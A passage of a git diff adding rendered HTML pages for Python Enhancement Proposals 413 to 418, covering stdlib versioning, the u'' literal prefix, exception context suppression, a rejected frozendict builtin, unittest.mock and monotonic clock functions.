  1. Change the release version number to the date of the current month.
  2. +
  3. Update the What’s New, NEWS and documentation to refer to the new release +number.
  4. +
  5. Make the new release.
  6. +
+

With the sequential scheme now proposed, such releases should at most require +a little tidying up of the What’s New document before making the release.

+
+
+

Why isn’t PEP 384 enough?

+

PEP 384 introduced the notion of a “Stable ABI” for CPython, a limited +subset of the full C ABI that is guaranteed to remain stable. Extensions +built against the stable ABI should be able to support all subsequent +Python versions with the same binary.

+

This will help new projects to avoid coupling their C extension modules too +closely to a specific version of CPython. For existing modules, however, +migrating to the stable ABI can involve quite a lot of work (especially for +extension modules that define a lot of classes). With limited development +resources available, any time spent on such a change is time that could +otherwise have been spent working on features that offer more direct benefits +to end users.

+

There are also other benefits to separate versioning (as described above) +that are not directly related to the question of binary compatibility with +third party C extensions.

+
+
+

Why no binary compatible additions to the C ABI in standard library releases?

+

There’s a case to be made that additions to the CPython C ABI could +reasonably be permitted in standard library releases. This would give C +extension authors the same freedom as any other package or module author +to depend either on a particular language version or on a standard library +version.

+

The PEP currently associates the interpreter version with the language +version, and therefore limits major interpreter changes (including C ABI +additions) to the language releases.

+

An alternative, internally consistent, approach would be to link the +interpreter version with the standard library version, with only changes that +may affect backwards compatibility limited to language releases.

+

Under such a scheme, the following changes would be acceptable in standard +library releases:

+
    +
  • Standard library updates
      +
    • new features in pure Python modules
    • +
    • new features in C extension modules (subject to PEP 399 compatibility +requirements)
    • +
    • new features in language builtins
    • +
    +
  • +
  • Interpreter implementation updates
      +
    • binary compatible additions to the C ABI
    • +
    • changes to the compilation toolchain that do not affect the AST or alter +the bytecode magic number
    • +
    • changes to the core interpreter eval loop
    • +
    +
  • +
  • bug fixes from the corresponding maintenance release
  • +
+

And the following changes would be acceptable in language releases:

+
    +
  • new language syntax
  • +
  • any updates acceptable in a standard library release
  • +
  • new deprecation warnings
  • +
  • removal of previously deprecated features
  • +
  • changes to the AST
  • +
  • changes to the emitted bytecode that require altering the magic number
  • +
  • binary incompatible changes to the C ABI (although the PEP 384 stable ABI +must still be preserved)
  • +
+

While such an approach could probably be made to work, there does not appear +to be a compelling justification for it, and the approach currently described +in the PEP is simpler and easier to explain.

+
+
+

Why not separate out the standard library entirely?

+

A concept that is occasionally discussed is the idea of making the standard +library truly independent from the CPython reference implementation.

+

My personal opinion is that actually making such a change would involve a +lot of work for next to no pay-off. CPython without the standard library is +useless (the build chain won’t even run, let alone the test suite). You also +can’t create a standalone pure Python standard library either, because too +many “standard library modules” are actually tightly linked in to the +internal details of their respective interpreters (for example, the builtins, +weakref, gc, sys, inspect, ast).

+

Creating a separate CPython development branch that is kept compatible with +the previous language release, and making releases from that branch that are +identified with a separate standard library version number should provide +most of the benefits of a separate standard library repository with only a +fraction of the pain.

+
+
+
+

Acknowledgements

+

Thanks go to the PEP 407 authors for starting this discussion, as well as +to those authors and Larry Hastings for initial discussions of the proposal +made in this PEP.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0413.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0414/index.html b/pep-0414/index.html new file mode 100644 index 00000000000..133a5171a53 --- /dev/null +++ b/pep-0414/index.html @@ -0,0 +1,525 @@ + + + + + + + + PEP 414 – Explicit Unicode Literal for Python 3.3 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 414 – Explicit Unicode Literal for Python 3.3

+
+
Author:
+
Armin Ronacher <armin.ronacher at active-4.com>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Feb-2012
+
Python-Version:
+
3.3
+
Post-History:
+
28-Feb-2012, 04-Mar-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document proposes the reintegration of an explicit unicode literal +from Python 2.x to the Python 3.x language specification, in order to +reduce the volume of changes needed when porting Unicode-aware +Python 2 applications to Python 3.

+
+
+

BDFL Pronouncement

+

This PEP has been formally accepted for Python 3.3:

+
+
I’m accepting the PEP. It’s about as harmless as they come. Make it so.
+
+
+

Proposal

+

This PEP proposes that Python 3.3 restore support for Python 2’s Unicode +literal syntax, substantially increasing the number of lines of existing +Python 2 code in Unicode aware applications that will run without modification +on Python 3.

+

Specifically, the Python 3 definition for string literal prefixes will be +expanded to allow:

+
"u" | "U"
+
+
+

in addition to the currently supported:

+
"r" | "R"
+
+
+

The following will all denote ordinary Python 3 strings:

+
'text'
+"text"
+'''text'''
+"""text"""
+u'text'
+u"text"
+u'''text'''
+u"""text"""
+U'text'
+U"text"
+U'''text'''
+U"""text"""
+
+
+

No changes are proposed to Python 3’s actual Unicode handling, only to the +acceptable forms for string literals.

+
+
+

Exclusion of “Raw” Unicode Literals

+

Python 2 supports a concept of “raw” Unicode literals that don’t meet the +conventional definition of a raw string: \uXXXX and \UXXXXXXXX escape +sequences are still processed by the compiler and converted to the +appropriate Unicode code points when creating the associated Unicode objects.

+

Python 3 has no corresponding concept - the compiler performs no +preprocessing of the contents of raw string literals. This matches the +behaviour of 8-bit raw string literals in Python 2.

+

Since such strings are rarely used and would be interpreted differently in +Python 3 if permitted, it was decided that leaving them out entirely was +a better choice. Code which uses them will thus still fail immediately on +Python 3 (with a Syntax Error), rather than potentially producing different +output.

+

To get equivalent behaviour that will run on both Python 2 and Python 3, +either an ordinary Unicode literal can be used (with appropriate additional +escaping within the string), or else string concatenation or string +formatting can be combine the raw portions of the string with those that +require the use of Unicode escape sequences.

+

Note that when using from __future__ import unicode_literals in Python 2, +the nominally “raw” Unicode string literals will process \uXXXX and +\UXXXXXXXX escape sequences, just like Python 2 strings explicitly marked +with the “raw Unicode” prefix.

+
+
+

Author’s Note

+

This PEP was originally written by Armin Ronacher, and Guido’s approval was +given based on that version.

+

The currently published version has been rewritten by Alyssa Coghlan to +include additional historical details and rationale that were taken into +account when Guido made his decision, but were not explicitly documented in +Armin’s version of the PEP.

+

Readers should be aware that many of the arguments in this PEP are not +technical ones. Instead, they relate heavily to the social and personal +aspects of software development.

+
+
+

Rationale

+

With the release of a Python 3 compatible version of the Web Services Gateway +Interface (WSGI) specification (PEP 3333) for Python 3.2, many parts of the +Python web ecosystem have been making a concerted effort to support Python 3 +without adversely affecting their existing developer and user communities.

+

One major item of feedback from key developers in those communities, including +Chris McDonough (WebOb, Pyramid), Armin Ronacher (Flask, Werkzeug), Jacob +Kaplan-Moss (Django) and Kenneth Reitz (requests) is that the requirement +to change the spelling of every Unicode literal in an application +(regardless of how that is accomplished) is a key stumbling block for porting +efforts.

+

In particular, unlike many of the other Python 3 changes, it isn’t one that +framework and library authors can easily handle on behalf of their users. Most +of those users couldn’t care less about the “purity” of the Python language +specification, they just want their websites and applications to work as well +as possible.

+

While it is the Python web community that has been most vocal in highlighting +this concern, it is expected that other highly Unicode aware domains (such as +GUI development) may run into similar issues as they (and their communities) +start making concerted efforts to support Python 3.

+
+
+

Common Objections

+
+

Complaint: This PEP may harm adoption of Python 3.2

+

This complaint is interesting, as it carries within it a tacit admission that +this PEP will make it easier to port Unicode aware Python 2 applications to +Python 3.

+

There are many existing Python communities that are prepared to put up with +the constraints imposed by the existing suite of porting tools, or to update +their Python 2 code bases sufficiently that the problems are minimised.

+

This PEP is not for those communities. Instead, it is designed specifically to +help people that don’t want to put up with those difficulties.

+

However, since the proposal is for a comparatively small tweak to the language +syntax with no semantic changes, it is feasible to support it as a third +party import hook. While such an import hook imposes some import time +overhead, and requires additional steps from each application that needs it +to get the hook in place, it allows applications that target Python 3.2 +to use libraries and frameworks that would otherwise only run on Python 3.3+ +due to their use of unicode literal prefixes.

+

One such import hook project is Vinay Sajip’s uprefix [4].

+

For those that prefer to translate their code in advance rather than +converting on the fly at import time, Armin Ronacher is working on a hook +that runs at install time rather than during import [5].

+

Combining the two approaches is of course also possible. For example, the +import hook could be used for rapid edit-test cycles during local +development, but the install hook for continuous integration tasks and +deployment on Python 3.2.

+

The approaches described in this section may prove useful, for example, for +applications that wish to target Python 3 on the Ubuntu 12.04 LTS release, +which will ship with Python 2.7 and 3.2 as officially supported Python +versions.

+
+
+

Complaint: Python 3 shouldn’t be made worse just to support porting from Python 2

+

This is indeed one of the key design principles of Python 3. However, one of +the key design principles of Python as a whole is that “practicality beats +purity”. If we’re going to impose a significant burden on third party +developers, we should have a solid rationale for doing so.

+

In most cases, the rationale for backwards incompatible Python 3 changes are +either to improve code correctness (for example, stricter default separation +of binary and text data and integer division upgrading to floats when +necessary), reduce typical memory usage (for example, increased usage of +iterators and views over concrete lists), or to remove distracting nuisances +that make Python code harder to read without increasing its expressiveness +(for example, the comma based syntax for naming caught exceptions). Changes +backed by such reasoning are not going to be reverted, regardless of +objections from Python 2 developers attempting to make the transition to +Python 3.

+

In many cases, Python 2 offered two ways of doing things for historical reasons. +For example, inequality could be tested with both != and <> and integer +literals could be specified with an optional L suffix. Such redundancies +have been eliminated in Python 3, which reduces the overall size of the +language and improves consistency across developers.

+

In the original Python 3 design (up to and including Python 3.2), the explicit +prefix syntax for unicode literals was deemed to fall into this category, as it +is completely unnecessary in Python 3. However, the difference between those +other cases and unicode literals is that the unicode literal prefix is not +redundant in Python 2 code: it is a programmatically significant distinction +that needs to be preserved in some fashion to avoid losing information.

+

While porting tools were created to help with the transition (see next section) +it still creates an additional burden on heavy users of unicode strings in +Python 2, solely so that future developers learning Python 3 don’t need to be +told “For historical reasons, string literals may have an optional u or +U prefix. Never use this yourselves, it’s just there to help with porting +from an earlier version of the language.”

+

Plenty of students learning Python 2 received similar warnings regarding string +exceptions without being confused or irreparably stunted in their growth as +Python developers. It will be the same with this feature.

+

This point is further reinforced by the fact that Python 3 still allows the +uppercase variants of the B and R prefixes for bytes literals and raw +bytes and string literals. If the potential for confusion due to string prefix +variants is that significant, where was the outcry asking that these +redundant prefixes be removed along with all the other redundancies that were +eliminated in Python 3?

+

Just as support for string exceptions was eliminated from Python 2 using the +normal deprecation process, support for redundant string prefix characters +(specifically, B, R, u, U) may eventually be eliminated +from Python 3, regardless of the current acceptance of this PEP. However, +such a change will likely only occur once third party libraries supporting +Python 2.7 is about as common as libraries supporting Python 2.2 or 2.3 is +today.

+
+
+

Complaint: The WSGI “native strings” concept is an ugly hack

+

One reason the removal of unicode literals has provoked such concern amongst +the web development community is that the updated WSGI specification had to +make a few compromises to minimise the disruption for existing web servers +that provide a WSGI-compatible interface (this was deemed necessary in order +to make the updated standard a viable target for web application authors and +web framework developers).

+

One of those compromises is the concept of a “native string”. WSGI defines +three different kinds of string:

+
    +
  • text strings: handled as unicode in Python 2 and str in Python 3
  • +
  • native strings: handled as str in both Python 2 and Python 3
  • +
  • binary data: handled as str in Python 2 and bytes in Python 3
  • +
+

Some developers consider WSGI’s “native strings” to be an ugly hack, as they +are explicitly documented as being used solely for latin-1 decoded +“text”, regardless of the actual encoding of the underlying data. Using this +approach bypasses many of the updates to Python 3’s data model that are +designed to encourage correct handling of text encodings. However, it +generally works due to the specific details of the problem domain - web server +and web framework developers are some of the individuals most aware of how +blurry the line can get between binary data and text when working with HTTP +and related protocols, and how important it is to understand the implications +of the encodings in use when manipulating encoded text data. At the +application level most of these details are hidden from the developer by +the web frameworks and support libraries (both in Python 2 and in Python 3).

+

In practice, native strings are a useful concept because there are some APIs +(both in the standard library and in third party frameworks and packages) and +some internal interpreter details that are designed primarily to work with +str. These components often don’t support unicode in Python 2 +or bytes in Python 3, or, if they do, require additional encoding details +and/or impose constraints that don’t apply to the str variants.

+

Some example of interfaces that are best handled by using actual str +instances are:

+
    +
  • Python identifiers (as attributes, dict keys, class names, module names, +import references, etc)
  • +
  • URLs for the most part as well as HTTP headers in urllib/http servers
  • +
  • WSGI environment keys and CGI-inherited values
  • +
  • Python source code for dynamic compilation and AST hacks
  • +
  • Exception messages
  • +
  • __repr__ return value
  • +
  • preferred filesystem paths
  • +
  • preferred OS environment
  • +
+

In Python 2.6 and 2.7, these distinctions are most naturally expressed as +follows:

+
    +
  • u"": text string (unicode)
  • +
  • "": native string (str)
  • +
  • b"": binary data (str, also aliased as bytes)
  • +
+

In Python 3, the latin-1 decoded native strings are not distinguished +from any other text strings:

+
    +
  • "": text string (str)
  • +
  • "": native string (str)
  • +
  • b"": binary data (bytes)
  • +
+

If from __future__ import unicode_literals is used to modify the behaviour +of Python 2, then, along with an appropriate definition of n(), the +distinction can be expressed as:

+
    +
  • "": text string
  • +
  • n(""): native string
  • +
  • b"": binary data
  • +
+

(While n=str works for simple cases, it can sometimes have problems +due to non-ASCII source encodings)

+

In the common subset of Python 2 and Python 3 (with appropriate +specification of a source encoding and definitions of the u() and b() +helper functions), they can be expressed as:

+
    +
  • u(""): text string
  • +
  • "": native string
  • +
  • b(""): binary data
  • +
+

That last approach is the only variant that supports Python 2.5 and earlier.

+

Of all the alternatives, the format currently supported in Python 2.6 and 2.7 +is by far the cleanest approach that clearly distinguishes the three desired +kinds of behaviour. With this PEP, that format will also be supported in +Python 3.3+. It will also be supported in Python 3.1 and 3.2 through the use +of import and install hooks. While it is significantly less likely, it is +also conceivable that the hooks could be adapted to allow the use of the +b prefix on Python 2.5.

+
+
+

Complaint: The existing tools should be good enough for everyone

+

A commonly expressed sentiment from developers that have already successfully +ported applications to Python 3 is along the lines of “if you think it’s hard, +you’re doing it wrong” or “it’s not that hard, just try it!”. While it is no +doubt unintentional, these responses all have the effect of telling the +people that are pointing out inadequacies in the current porting toolset +“there’s nothing wrong with the porting tools, you just suck and don’t know +how to use them properly”.

+

These responses are a case of completely missing the point of what people are +complaining about. The feedback that resulted in this PEP isn’t due to people +complaining that ports aren’t possible. Instead, the feedback is coming from +people that have successfully completed ports and are objecting that they +found the experience thoroughly unpleasant for the class of application that +they needed to port (specifically, Unicode aware web frameworks and support +libraries).

+

This is a subjective appraisal, and it’s the reason why the Python 3 +porting tools ecosystem is a case where the “one obvious way to do it” +philosophy emphatically does not apply. While it was originally intended that +“develop in Python 2, convert with 2to3, test both” would be the standard +way to develop for both versions in parallel, in practice, the needs of +different projects and developer communities have proven to be sufficiently +diverse that a variety of approaches have been devised, allowing each group +to select an approach that best fits their needs.

+

Lennart Regebro has produced an excellent overview of the available migration +strategies [2], and a similar review is provided in the official porting +guide [3]. (Note that the official guidance has softened to “it depends on +your specific situation” since Lennart wrote his overview).

+

However, both of those guides are written from the founding assumption that +all of the developers involved are already committed to the idea of +supporting Python 3. They make no allowance for the social aspects of such a +change when you’re interacting with a user base that may not be especially +tolerant of disruptions without a clear benefit, or are trying to persuade +Python 2 focused upstream developers to accept patches that are solely about +improving Python 3 forward compatibility.

+

With the current porting toolset, every migration strategy will result in +changes to every Unicode literal in a project. No exceptions. They will +be converted to either an unprefixed string literal (if the project decides to +adopt the unicode_literals import) or else to a converter call like +u("text").

+

If the unicode_literals import approach is employed, but is not adopted +across the entire project at the same time, then the meaning of a bare string +literal may become annoyingly ambiguous. This problem can be particularly +pernicious for aggregated software, like a Django site - in such a situation, +some files may end up using the unicode_literals import and others may not, +creating definite potential for confusion.

+

While these problems are clearly solvable at a technical level, they’re a +completely unnecessary distraction at the social level. Developer energy should +be reserved for addressing real technical difficulties associated with the +Python 3 transition (like distinguishing their 8-bit text strings from their +binary data). They shouldn’t be punished with additional code changes (even +automated ones) solely due to the fact that they have already explicitly +identified their Unicode strings in Python 2.

+

Armin Ronacher has created an experimental extension to 2to3 which only +modernizes Python code to the extent that it runs on Python 2.7 or later with +support from the cross-version compatibility six library. This tool is +available as python-modernize [1]. Currently, the deltas generated by +this tool will affect every Unicode literal in the converted source. This +will create legitimate concerns amongst upstream developers asked to accept +such changes, and amongst framework users being asked to change their +applications.

+

However, by eliminating the noise from changes to the Unicode literal syntax, +many projects could be cleanly and (comparatively) non-controversially made +forward compatible with Python 3.3+ just by running python-modernize and +applying the recommended changes.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0414.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0415/index.html b/pep-0415/index.html new file mode 100644 index 00000000000..67a29a283c8 --- /dev/null +++ b/pep-0415/index.html @@ -0,0 +1,198 @@ + + + + + + + + PEP 415 – Implement context suppression with exception attributes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 415 – Implement context suppression with exception attributes

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Feb-2012
+
Python-Version:
+
3.3
+
Post-History:
+
26-Feb-2012
+
Replaces:
+
409
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 409 introduced support for the raise exc from None construct to +allow the display of the exception context to be explicitly suppressed. +This PEP retains the language level changes already implemented in PEP 409, +but replaces the underlying implementation mechanism with a simpler approach +based on a new __suppress_context__ attribute on all BaseException +instances.

+
+
+

PEP Acceptance

+

This PEP was accepted by Alyssa Coghlan on the 14th of May, 2012.

+
+
+

Rationale

+

PEP 409 changes __cause__ to be Ellipsis by default. Then if +__cause__ is set to None by raise exc from None, no context or cause +will be printed should the exception be uncaught.

+

The main problem with this scheme is it complicates the role of +__cause__. __cause__ should indicate the cause of the exception not +whether __context__ should be printed or not. This use of __cause__ is +also not easily extended in the future. For example, we may someday want to +allow the programmer to select which of __context__ and __cause__ will +be printed. The PEP 409 implementation is not amenable to this.

+

The use of Ellipsis is a hack. Before PEP 409, Ellipsis was used +exclusively in extended slicing. Extended slicing has nothing to do with +exceptions, so it’s not clear to someone inspecting an exception object why +__cause__ should be set to Ellipsis. Using Ellipsis by default for +__cause__ makes it asymmetrical with __context__.

+
+
+

Proposal

+

A new attribute on BaseException, __suppress_context__, will +be introduced. Whenever __cause__ is set, __suppress_context__ +will be set to True. In particular, raise exc from cause +syntax will set exc.__suppress_context__ to True. Exception +printing code will check for that attribute to determine whether +context and cause will be printed. __cause__ will return to its +original purpose and values.

+

There is precedence for __suppress_context__ with the +print_line_and_file exception attribute.

+

To summarize, raise exc from cause will be equivalent to:

+
exc.__cause__ = cause
+raise exc
+
+
+

where exc.__cause__ = cause implicitly sets +exc.__suppress_context__.

+
+
+

Patches

+

There is a patch on Issue 14133.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0415.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0416/index.html b/pep-0416/index.html new file mode 100644 index 00000000000..977868ca23e --- /dev/null +++ b/pep-0416/index.html @@ -0,0 +1,350 @@ + + + + + + + + PEP 416 – Add a frozendict builtin type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 416 – Add a frozendict builtin type

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Feb-2012
+
Python-Version:
+
3.3
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

I’m rejecting this PEP. A number of reasons (not exhaustive):

+
    +
  • According to Raymond Hettinger, use of frozendict is low. Those +that do use it tend to use it as a hint only, such as declaring +global or class-level “constants”: they aren’t really immutable, +since anyone can still assign to the name.
  • +
  • There are existing idioms for avoiding mutable default values.
  • +
  • The potential of optimizing code using frozendict in PyPy is +unsure; a lot of other things would have to change first. The same +holds for compile-time lookups in general.
  • +
  • Multiple threads can agree by convention not to mutate a shared +dict, there’s no great need for enforcement. Multiple processes +can’t share dicts.
  • +
  • Adding a security sandbox written in Python, even with a limited +scope, is frowned upon by many, due to the inherent difficulty with +ever proving that the sandbox is actually secure. Because of this +we won’t be adding one to the stdlib any time soon, so this use +case falls outside the scope of a PEP.
  • +
+

On the other hand, exposing the existing read-only dict proxy as a +built-in type sounds good to me. (It would need to be changed to +allow calling the constructor.) GvR.

+

Update (2012-04-15): A new MappingProxyType type was added to the types +module of Python 3.3.

+
+
+

Abstract

+

Add a new frozendict builtin type.

+
+
+

Rationale

+

A frozendict is a read-only mapping: a key cannot be added nor removed, and a +key is always mapped to the same value. However, frozendict values can be not +hashable. A frozendict is hashable if and only if all values are hashable.

+

Use cases:

+
    +
  • Immutable global variable like a default configuration.
  • +
  • Default value of a function parameter. Avoid the issue of mutable default +arguments.
  • +
  • Implement a cache: frozendict can be used to store function keywords. +frozendict can be used as a key of a mapping or as a member of set.
  • +
  • frozendict avoids the need of a lock when the frozendict is shared +by multiple threads or processes, especially hashable frozendict. It would +also help to prohibe coroutines (generators + greenlets) to modify the +global state.
  • +
  • frozendict lookup can be done at compile time instead of runtime because the +mapping is read-only. frozendict can be used instead of a preprocessor to +remove conditional code at compilation, like code specific to a debug build.
  • +
  • frozendict helps to implement read-only object proxies for security modules. +For example, it would be possible to use frozendict type for __builtins__ +mapping or type.__dict__. This is possible because frozendict is compatible +with the PyDict C API.
  • +
  • frozendict avoids the need of a read-only proxy in some cases. frozendict is +faster than a proxy because getting an item in a frozendict is a fast lookup +whereas a proxy requires a function call.
  • +
+
+
+

Constraints

+
    +
  • frozendict has to implement the Mapping abstract base class
  • +
  • frozendict keys and values can be unorderable
  • +
  • a frozendict is hashable if all keys and values are hashable
  • +
  • frozendict hash does not depend on the items creation order
  • +
+
+
+

Implementation

+
    +
  • Add a PyFrozenDictObject structure based on PyDictObject with an extra +“Py_hash_t hash;” field
  • +
  • frozendict.__hash__() is implemented using hash(frozenset(self.items())) and +caches the result in its private hash attribute
  • +
  • Register frozendict as a collections.abc.Mapping
  • +
  • frozendict can be used with PyDict_GetItem(), but PyDict_SetItem() and +PyDict_DelItem() raise a TypeError
  • +
+
+
+

Recipe: hashable dict

+

To ensure that a frozendict is hashable, values can be checked +before creating the frozendict:

+
import itertools
+
+def hashabledict(*args, **kw):
+    # ensure that all values are hashable
+    for key, value in itertools.chain(args, kw.items()):
+        if isinstance(value, (int, str, bytes, float, frozenset, complex)):
+            # avoid the compute the hash (which may be slow) for builtin
+            # types known to be hashable for any value
+            continue
+        hash(value)
+        # don't check the key: frozendict already checks the key
+    return frozendict.__new__(cls, *args, **kw)
+
+
+
+
+

Objections

+

namedtuple may fit the requirements of a frozendict.

+

A namedtuple is not a mapping, it does not implement the Mapping abstract base +class.

+

frozendict can be implemented in Python using descriptors” and “frozendict +just need to be practically constant.

+

If frozendict is used to harden Python (security purpose), it must be +implemented in C. A type implemented in C is also faster.

+

The PEP 351 was rejected.

+

The PEP 351 tries to freeze an object and so may convert a mutable object to an +immutable object (using a different type). frozendict doesn’t convert anything: +hash(frozendict) raises a TypeError if a value is not hashable. Freezing an +object is not the purpose of this PEP.

+
+
+

Alternative: dictproxy

+

Python has a builtin dictproxy type used by type.__dict__ getter descriptor. +This type is not public. dictproxy is a read-only view of a dictionary, but it +is not read-only mapping. If a dictionary is modified, the dictproxy is also +modified.

+

dictproxy can be used using ctypes and the Python C API, see for example the +make dictproxy object via ctypes.pythonapi and type() (Python recipe 576540) +by Ikkei Shimomura. The recipe contains a test checking that a dictproxy is +“mutable” (modify the dictionary linked to the dictproxy).

+

However dictproxy can be useful in some cases, where its mutable property is +not an issue, to avoid a copy of the dictionary.

+
+
+

Existing implementations

+

Whitelist approach.

+
    +
  • Implementing an Immutable Dictionary (Python recipe 498072) by Aristotelis Mikropoulos. +Similar to frozendict except that it is not truly read-only: it is possible +to access to this private internal dict. It does not implement __hash__ and +has an implementation issue: it is possible to call again __init__() to +modify the mapping.
  • +
  • PyWebmail contains an ImmutableDict type: webmail.utils.ImmutableDict. +It is hashable if keys and values are hashable. It is not truly read-only: +its internal dict is a public attribute.
  • +
  • remember project: remember.dicts.FrozenDict. +It is used to implement a cache: FrozenDict is used to store function callbacks. +FrozenDict may be hashable. It has an extra supply_dict() class method to +create a FrozenDict from a dict without copying the dict: store the dict as +the internal dict. Implementation issue: __init__() can be called to modify +the mapping and the hash may differ depending on item creation order. The +mapping is not truly read-only: the internal dict is accessible in Python.
  • +
+

Blacklist approach: inherit from dict and override write methods to raise an +exception. It is not truly read-only: it is still possible to call dict methods +on such “frozen dictionary” to modify it.

+ +

Hashable dict: inherit from dict and just add an __hash__ method.

+ +
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0416.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0417/index.html b/pep-0417/index.html new file mode 100644 index 00000000000..d6ebc1cd56f --- /dev/null +++ b/pep-0417/index.html @@ -0,0 +1,198 @@ + + + + + + + + PEP 417 – Including mock in the Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 417 – Including mock in the Standard Library

+
+
Author:
+
Michael Foord <michael at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Mar-2012
+
Python-Version:
+
3.3
+
Post-History:
+
12-Mar-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding the mock [1] testing library +to the Python standard library as unittest.mock.

+
+
+

Rationale

+

Creating mock objects for testing is a common need in Python. +Many developers create ad-hoc mocks, as needed, in their test +suites. This is currently what we do in the Python test suite, +where a standardised mock object library would be helpful.

+

There are many mock object libraries available for Python [2]. +Of these, mock is overwhelmingly the most popular, with as many +downloads on PyPI as the other mocking libraries combined.

+

An advantage of mock is that it is a mocking library and not a +framework. It provides a configurable and flexible mock object, +without being opinionated about how you write your tests. The +mock api is now well battle-tested and stable.

+

mock also handles safely monkeypatching and unmonkeypatching +objects during the scope of a test. This is hard to do safely +and many developers / projects mimic this functionality +(often incorrectly). A standardised way to do this, handling +the complexity of patching in the presence of the descriptor +protocol (etc) is useful. People are asking for a “patch” [3] +feature to unittest. Doing this via mock.patch is preferable +to re-implementing part of this functionality in unittest.

+
+
+

Background

+

Addition of mock to the Python standard library was discussed +and agreed to at the Python Language Summit 2012.

+
+
+

Open Issues

+

As of release 0.8, which is current at the time of writing, +mock is compatible with Python 2.4-3.2. Moving into the Python +standard library will allow for the removal of some Python 2 +specific “compatibility hacks”.

+

mock 0.8 introduced a new feature, “auto-speccing”, obsoletes +an older mock feature called “mocksignature”. The +“mocksignature” functionality can be removed from mock +altogether prior to inclusion.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0417.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0418/index.html b/pep-0418/index.html new file mode 100644 index 00000000000..f7ca29f6100 --- /dev/null +++ b/pep-0418/index.html @@ -0,0 +1,2179 @@ + + + + + + + + PEP 418 – Add monotonic time, performance counter, and process time functions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 418 – Add monotonic time, performance counter, and process time functions

+
+
Author:
+
Cameron Simpson <cs at cskk.id.au>, +Jim J. Jewett <jimjjewett at gmail.com>, +Stephen J. Turnbull <stephen at xemacs.org>, +Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Mar-2012
+
Python-Version:
+
3.3
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add time.get_clock_info(name), +time.monotonic(), time.perf_counter() and +time.process_time() functions to Python 3.3.

+
+
+

Rationale

+

If a program uses the system time to schedule events or to implement +a timeout, it may fail to run events at the right moment or stop the +timeout too early or too late when the system time is changed manually or +adjusted automatically by NTP. A monotonic clock should be used +instead to not be affected by system time updates: +time.monotonic().

+

To measure the performance of a function, time.clock() can be used +but it is very different on Windows and on Unix. On Windows, +time.clock() includes time elapsed during sleep, whereas it does +not on Unix. time.clock() resolution is very good on Windows, but +very bad on Unix. The new time.perf_counter() function should be +used instead to always get the most precise performance counter with a +portable behaviour (ex: include time spend during sleep).

+

Until now, Python did not provide directly a portable +function to measure CPU time. time.clock() can be used on Unix, +but it has bad +resolution. resource.getrusage() or os.times() can also be +used on Unix, but they require to compute the sum of time +spent in kernel space and user space. The new time.process_time() +function acts as a portable counter that always measures CPU time +(excluding time elapsed during sleep) and has the best available +resolution.

+

Each operating system implements clocks and performance counters +differently, and it is useful to know exactly which function is used +and some properties of the clock like its resolution. The new +time.get_clock_info() function gives access to all available +information about each Python time function.

+

New functions:

+
    +
  • time.monotonic(): timeout and scheduling, not affected by system +clock updates
  • +
  • time.perf_counter(): benchmarking, most precise clock for short +period
  • +
  • time.process_time(): profiling, CPU time of the process
  • +
+

Users of new functions:

+
    +
  • time.monotonic(): concurrent.futures, multiprocessing, queue, subprocess, +telnet and threading modules to implement timeout
  • +
  • time.perf_counter(): trace and timeit modules, pybench program
  • +
  • time.process_time(): profile module
  • +
  • time.get_clock_info(): pybench program to display information about the +timer like the resolution
  • +
+

